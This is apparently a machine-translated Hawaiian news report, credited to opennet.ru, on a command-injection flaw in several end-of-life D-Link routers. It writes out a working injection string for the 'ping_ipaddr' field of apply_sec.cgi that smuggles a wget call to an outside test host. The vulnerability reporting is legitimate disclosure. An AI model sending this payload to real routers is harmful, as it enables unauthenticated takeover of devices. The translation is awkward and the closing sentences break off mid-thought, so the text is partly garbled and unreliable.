I nā mea hoʻokele uila D-Link
ʻO ka mea e mahalo ai, e like me nā mea hoʻomohala firmware, pono e hoʻokō ʻia ke kelepona "ping_test" ma hope o ka hōʻoia ʻana, akā i ka ʻoiaʻiʻo ua kapa ʻia i kēlā me kēia hihia, me ka nānā ʻole ʻana i ke komo ʻana i ka interface pūnaewele. ʻO ka mea nui, i ka wā e komo ai i ka palapala apply_sec.cgi a me ka hāʻawi ʻana i ka ʻāpana "action=ping_test", hoʻihoʻi ka palapala i ka ʻaoʻao hōʻoia, akā i ka manawa like e hana i ka hana pili me ping_test. No ka hoʻokō ʻana i ke code, ua hoʻohana ʻia kekahi mea nāwaliwali ma ping_test iā ia iho, e kāhea ana i ka pono ping me ka ʻole o ka nānā pono ʻana i ka pololei o ka helu IP i hoʻouna ʻia no ka hoʻāʻo. No ka laʻana, e kāhea i ka pono wget a hoʻololi i nā hopena o ke kauoha "echo 1234" i kahi hoʻokipa o waho, e kuhikuhi wale i ka ʻāpana "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Ua hōʻoia ʻia ka loaʻa ʻana o ka vulnerability i nā hiʻohiʻona aʻe:
- DIR-655 me ka firmware 3.02b05 a i ʻole;
- DIR-866L me ka firmware 1.03b04 a i ʻole;
- DIR-1565 me ka firmware 1.01 a i ʻole;
- DIR-652 (ʻaʻole hāʻawi ʻia ka ʻikepili i nā mana firmware pilikia)
Ua pau ka manawa kākoʻo no kēia mau hiʻohiʻona, no laila D-Link
Ua ʻike ʻia ma hope mai ʻo ia ka nāwaliwali
Source: opennet.ru